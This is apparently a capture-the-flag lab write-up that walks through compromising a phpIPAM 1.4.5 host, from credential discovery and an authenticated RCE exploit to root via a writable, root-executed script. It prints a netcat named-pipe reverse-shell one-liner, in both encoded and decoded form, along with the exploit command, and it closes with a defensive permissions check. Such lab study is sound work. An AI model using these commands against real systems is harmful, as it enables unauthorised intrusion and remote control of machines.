Target IP: 10.10.237.226
Challenge Description:
Performing an nmap scan shows there are three TCP ports open on the target machine, as shown above.
Performing an aggressive nmap scan against the three open TCP ports returns the result above. I will start enumeration with the application on port 1337 first.
Port 1337: Application
I connected to the application on port 1337 on the target machine via nc. This application seems to provide the credentials admin:OllieUnixMontgomery! for an administration panel. The next step is to locate this administration panel.
Port 80: HTTP
Browsing to this port displays the login webpage above. Can I use the credentials admin:OllieUnixMontgomery! here? Another interesting detail is the application and its version: this is phpIPAM IP address management, v1.4.5.
I know phpIPAM 1.4.5 is vulnerable to authenticated RCE, as shown above, so the credentials from port 1337 are exactly what the exploit needs. Before firing any exploits against the target machine, I wish to enumerate this machine further.
Using the credentials admin:OllieUnixMontgomery!, I logged in successfully as shown above. I enumerated the application to find any useful files, but I did not find anything useful.
I downloaded the exploit from this link and ran it against the target machine using the command python3 exp.py -url http://10.10.237.226/ -usr admin -pwd OllieUnixMontgomery! --shell (the password ends in an exclamation mark, so quote it in an interactive bash session to stop history expansion from mangling it). This exploit opened a simple shell that I can use to perform RCE, as shown above. Time to elevate this to a more stable reverse shell connection.
I started a listener on port 8443 on my machine. Then, using the exploit's shell, I deployed the URL-encoded reverse shell script rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.14.55.153%208443%20%3E%2Ftmp%2Ff to the target machine. Decoded, this is the classic named-pipe shell rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.14.55.153 8443 >/tmp/f, percent-encoded so that the semicolons, pipes and redirects survive being passed as a URL parameter. I obtained a reverse shell connection on my machine at port 8443, as shown above. Now I have a foothold on the target machine with a session as www-data.
The config.php located at /var/www/html contains the credentials phpipam_ollie:IamDah1337estHackerDog! of the database application running at port 3306. However, I am unable to connect to the database application.
Running cat /etc/passwd shows there is a user called ollie. Trying to switch to this user with the database password IamDah1337estHackerDog! does not work; however, the password OllieUnixMontgomery! from port 1337 does, as shown above. This user likes to reuse their passwords. I successfully elevated my privileges from the user www-data to ollie. Time to obtain root privileges.
Running the command find / -writable -type f 2>/dev/null shows an interesting entry called /usr/bin/feedme.
Running ls -la /usr/bin/feedme shows the user ollie has rw permissions on it. Using cat, I viewed the contents of this file and obtained the result above. This script is interesting.
I transferred pspy64 to the target machine and ran it, and obtained the interesting result above. It looks like the script feedme gets executed periodically as the user root. From the previous enumeration, I know I have write permission over it too, meaning I can put my reverse shell script inside it and wait for root to run it.
In the picture above, the text highlighted in green is the reverse shell script I put inside feedme. Then I started a listener on port 8444 on my machine to catch this shell.
And now I have a root reverse shell connection on port 8444, as shown in the bottom terminal of the picture above. Now I have root access on the target machine :)
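The root path on this box is a file that root executes but a low-privilege user can modify. As an added example, not from the writeup, here is a small POSIX sh check that lists world-writable regular files in the directories root jobs typically execute from, together with the remediation a sysadmin would apply to a file like feedme. The function names and the directory list are mine; the check uses the other-write bit, so it is narrower than the find / -writable sweep used above (which also catches files writable through ownership or group membership), and the chown step only takes effect when run as root.

```sh
#!/bin/sh
# Added example (not from the writeup): hunt for and fix world-writable files
# in locations that root cron jobs and scripts are commonly run from.

# Print every regular file under the given directories that has the
# other-write bit set (mode ----- -w-), i.e. any local user can edit it.
world_writable_files() {
    for d in "$@"; do
        [ -d "$d" ] || continue
        find "$d" -type f -perm -002 2>/dev/null
    done
}

# Remediation for a root-executed script: root should own it and nobody
# but the owner should be able to write it. chown needs root; if it fails
# the chmod still removes the dangerous write bits.
lock_down() {
    chown root:root "$1" 2>/dev/null || true
    chmod go-w "$1"
}

# Typical sweep on a Linux host (assumed directory list, adjust to taste):
# world_writable_files /usr/bin /usr/local/bin /usr/local/sbin /etc/cron.d /etc/cron.hourly /etc/cron.daily
```

Anything this prints that also appears in a crontab, a systemd timer or a pspy trace running as root is a straightforward privilege escalation; fixing the permissions is the cheap part, but the file should also be diffed against its original contents before trusting it again.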
The user.txt flag is shown above.
The root.txt flag is shown above.